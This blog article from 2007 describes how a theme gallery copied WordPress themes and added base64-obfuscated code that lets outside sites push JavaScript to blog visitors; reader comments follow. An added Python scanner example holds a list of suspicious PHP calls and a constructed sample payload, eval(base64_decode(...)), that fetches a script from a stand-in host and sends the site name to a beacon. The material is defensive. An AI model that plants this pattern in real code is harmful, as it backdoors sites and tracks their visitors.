
WordPress is growing quickly, both as a hosted platform and via standalone blog installations. That rapid growth, together with its open, flexible approach to blog design, makes it a target for hackers who embed malicious code within the themes they distribute.

One of the reasons for its success is the flexibility it offers for customization. WordPress is built around a central engine, written in PHP, called The Loop. Every time a blog is viewed, The Loop assembles each part of the page: a header, the body and its posts, a sidebar, and a footer. Blog operators are free to change these elements: they can modify the stylesheets to change fonts and colors; they can change the PHP code to display things like author details or popular tags; and they can install plug-ins to further extend the capabilities of their site.

Designers bundle up stylesheets, PHP code, and sometimes plug-ins, into themes. A WordPress theme isn't just cosmetics: it's code. If you change a theme in PowerPoint, you're just changing fonts and colors. But when you change a theme in WordPress, you're also changing the underlying behaviour of the site, including the database queries it runs and the PHP it executes.

The tremendous flexibility this offers gives us the rich variety of blogs available today. WordPress distributes some of these themes through its own theme browser, but themes are also offered by many sites and by individual developers. And WordPress has worked hard to make enabling a new theme as easy as copying it to a blog and clicking on a thumbnail.

With any successful platform, the hackers aren’t far behind. Apple’s Mac is widely regarded as more secure than a Windows PC, but that security may also be a result of fewer people attacking it. So as WordPress grows, it becomes a prime target for attack.

The richness of WordPress themes is an excellent opportunity for attackers. Theme code executes on the server, inside the same PHP process as WordPress itself, where it can do all kinds of bad things. Because installing a theme is so easy, blog owners who would never install untested code on a server are deploying themes on their blogs without realizing that hidden code is coming along for the ride.

Here’s a real example.

Seattle-based designer Derek Punsalan makes acclaimed WordPress themes, and has released several of them to the world. Other theme sites have copied his themes. One such theme copier is WP-Sphere.

When you download Punsalan’s theme from the WP-Sphere site, it contains some extra code that he didn’t include. It’s a long string of cryptic-looking characters that most users wouldn’t question:


The first part of the string offers a clue: it calls a PHP function to decode a block of text that has been encoded as base64. Run that block through a base64 decoder and the string looks a lot more malicious:


The decoded code makes the WordPress server connect to several sites (wpssr.com, wpsnc.com, and wpsnc2.com) and lets whoever runs those sites deliver an arbitrary piece of JavaScript to the blog's visitors. The sites are registered through an anonymous registrar in Vancouver, British Columbia.
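Two checks a blog owner can run on a downloaded theme before activating it, written here as an added example (this is not code from the article, from Punsalan, or from WP-Sphere): diff the downloaded copy against the designer's original release to list every line that was not in it, and decode any base64_decode('...') literal to see which PHP functions the hidden code calls and which hosts it contacts. The theme files, the hidden payload and the hosts under .invalid are all constructed for the example; scan_directory() runs the same scan over a real theme folder.

```python
"""Two checks for a WordPress theme downloaded from a third-party gallery:
(1) diff it against the designer's original release, and (2) decode any
base64_decode() literals and report what the hidden PHP calls and reaches out to.
Added example, not code from the article; all sample data below is constructed."""
import base64
import binascii
import difflib
import re
from pathlib import Path

# PHP functions an honest theme rarely needs; any of them in a template deserves a look.
SUSPICIOUS_CALLS = ("eval", "base64_decode", "gzinflate", "str_rot13", "file_get_contents",
                    "curl_exec", "fsockopen", "create_function", "assert")
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
CALL = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(")
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def decode_payloads(php_source):
    """Plaintext of every base64_decode('...') literal in one PHP file (one layer only)."""
    out = []
    for m in B64_CALL.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. a truncated literal); skip it
    return out


def analyse_file(name, php_source):
    """Suspicious calls in the visible source and in decoded payloads, plus remote hosts."""
    payloads = decode_payloads(php_source)
    calls = sorted({c for text in [php_source] + payloads for c in CALL.findall(text)})
    hosts = sorted({h for p in payloads for h in HOST.findall(p)})
    # eval(base64_decode(...)) is the classic footer-injection pattern; flag it explicitly.
    evals_encoded = re.search(r"eval\s*\(\s*base64_decode", php_source) is not None
    return {"file": name, "calls": calls, "hosts": hosts,
            "payloads": payloads, "evals_encoded": evals_encoded}


def scan_sources(sources):
    """sources: {filename: php_text}. Returns findings only for files that need a look."""
    return [f for f in (analyse_file(n, s) for n, s in sources.items())
            if f["calls"] or f["payloads"]]


def scan_directory(theme_dir):
    """Same scan over a real theme folder, e.g. wp-content/themes/<name>."""
    files = {str(p): p.read_text(errors="replace") for p in Path(theme_dir).rglob("*.php")}
    return scan_sources(files)


def extra_lines(original, copy):
    """Lines present in a redistributed copy but absent from the designer's original, per file."""
    extra = {}
    for name, text in copy.items():
        diff = difflib.unified_diff(original.get(name, "").splitlines(),
                                    text.splitlines(), lineterm="", n=0)
        added = [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]
        if added:
            extra[name] = added
    return extra


# --- constructed sample data (hypothetical hosts under the reserved .invalid TLD) -----
HIDDEN_PHP = ("$u = urlencode($_SERVER['HTTP_HOST']);"
              "echo '<script src=\"http://themes-tracker.example.invalid/js.php?u=' . $u . '\"></script>';"
              "@file_get_contents('http://beacon.example.invalid/ping?u=' . $u);")
INJECTED_LINE = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(HIDDEN_PHP.encode()).decode()
ORIGINAL_THEME = {
    "header.php": "<?php wp_head(); ?>\n<body <?php body_class(); ?>>\n",
    "footer.php": "<div id=\"footer\">\n  <p>Theme by Example Designer</p>\n</div>\n</body></html>\n",
}
COPIED_THEME = {
    "header.php": ORIGINAL_THEME["header.php"],
    "footer.php": ORIGINAL_THEME["footer.php"].replace("</body>", INJECTED_LINE + "\n</body>"),
}

if __name__ == "__main__":
    for name, lines in extra_lines(ORIGINAL_THEME, COPIED_THEME).items():
        print("%s: %d line(s) not in the original" % (name, len(lines)))
    for f in scan_sources(COPIED_THEME):
        print("%s: calls=%s hosts=%s eval(base64_decode)=%s"
              % (f["file"], f["calls"], f["hosts"], f["evals_encoded"]))
        for p in f["payloads"]:
            print("  decoded: " + p)
```

Only one layer of encoding is unwrapped: real obfuscators nest gzinflate() and str_rot13() around base64_decode(), so a payload that decodes to another call from the suspicious list deserves a second pass by hand. Base64 also has legitimate uses, so treat a hit as a reason to read the file, not as proof of malice; the diff against the designer's original is the more reliable of the two checks when the original is available.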

“These types of theme galleries are taking advantage of unsuspecting WordPress users who assume that the themes they are downloading are no different than the next,” says Punsalan. “Although it is difficult to police and prevent individuals from following requests not to redistribute, it has become quite apparent that the WordPress community needs to make a stand.”

Paul Carroll wrote about this string a couple of weeks ago. He concluded that, at its most innocent, this is a way for WP-Sphere to keep track of who’s using themes, but that it presents an excellent back door for injecting malicious code every time someone visits a site. In theory, WP-Sphere could inject advertising into the pages of people who use their copied, modified themes. Punsalan has a write-up on his blog of the situation as well.

Perhaps most disturbingly, until yesterday, WP-Sphere was the number one paid search result for “WordPress Themes” on Google. Today, there are sites and plug-ins devoted to blog security and detecting vulnerabilities. But WordPress is popular enough that it’s going to have to tackle this directly. The flexibility that makes it great also allows those with malicious intent to put bad code inside the blogs of innocents. Now, the blogging community has to figure out some kind of a certification process that doesn’t stifle innovation.

One approach proposed by Matthew Mullenweg, founding developer of WordPress, is a marketplace consisting of certified, GPL-licensed themes. "This is no different from malware, and in many ways much worse," says Mullenweg. "All 2000+ themes in our official directory are vetted for this kind of thing, and it's obviously dangerous."

[Disclosure: Automattic, a start-up founded by Matt Mullenweg is backed by True Ventures, lead investors in the parent company of this blog.]

 Alistair Croll is a co-founder of Coradiant. He writes about online user performance on Coradiant’s corporate blog and tries to out-guess the future at bitcurrent.com.


  1. Chat Marchet News Digest » WordPress Themes & Web Security Monday, November 26, 2007

    [...] Read the full story… This entry was posted on Tuesday, November 27th, 2007 at 4:12 am and is filed under le Chat Marchet. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site. [...]

  2. » Malicious Code In Themes and Templates – Webfeed Central Monday, November 26, 2007

    [...] what I read today, specifically talked about WordPress and some extra code that’s already been found in at [...]

  3. It's true: those "cryptic-looking characters" are code that allows the owner to place a text link ad on the blog of the person that's using the theme. Some designers use the code to prevent bloggers from editing their footer link, thus ensuring that the sponsor's link remains intact.

  4. The problems with WordPress themes are back | aNieto2K Tuesday, November 27, 2007

    [...] I discover another possible case; I say possible because the big names at WordPress have not spoken out on the matter. This time it [...]

  5. Dr Farrukh Malik Tuesday, November 27, 2007

    This article gives a newer level of understanding regarding security issues with the WordPress platform. It's WordPress who needs to come into action, and only then can we have something substantial. The proposed idea of certification for themes and plugins is an intelligent one, and we need to look into it since it will save many newbies like myself from getting trapped in any malicious act. Thanks for writing such a nice article.

  6. Hackers can easily hack code if you're using PHP files as your template files, or in other words mixing core logic with UI. You need to use .html or .tpl files as templates, as phpBB and 4images do. They are a bit slower, but your code is more secure this way.

  7. Krąg Starszoharcerski "Matrix" » Blog Archive » Security: WordPress skins Tuesday, November 27, 2007

    [...] is an unfounded concern – there are quite serious grounds for it. What, then, can [...]

  8. Wow, I was with you all the way, right up until you said: “Apple’s Mac is widely regarded as more secure than a Windows PC, but that security may also be a result of fewer people attacking it.”

    That argument's been and gone. Warning! Trust rank running low!

    But seriously, this to me sounds like an argument for some kind of registration system. I know it’s onerous, but it would do away with a lot of the security problems.

    An example would be where the template designer registers their template with WordPress, who then issue an MD5 code.

    When anyone then runs the template — which is inside a ‘wrapper’ file — the template itself checks back with WordPress to verify the hash code is valid.

    Or something like that…

  9. You make some excellent points. I believe the multitude of plugins pose similar threat as well although it might be easier to bury such malicious code in a theme. The comment thread in Matt’s post about the WP Theme Marketplace is awesome. Thanks for the reference.

  10. @Wayne:

    His statement that Macs are more secure is true. Just look at the facts. Hackers don’t go after Macs as often. You cannot argue this point. You can say the reason is because Apple has a smaller marketshare, but you cannot honestly argue that Windows computers are more secure than Apple computers.

    I only hope that in making a statement such as this, you have used an Apple computer for a longer period of time than a visit to the Apple store.
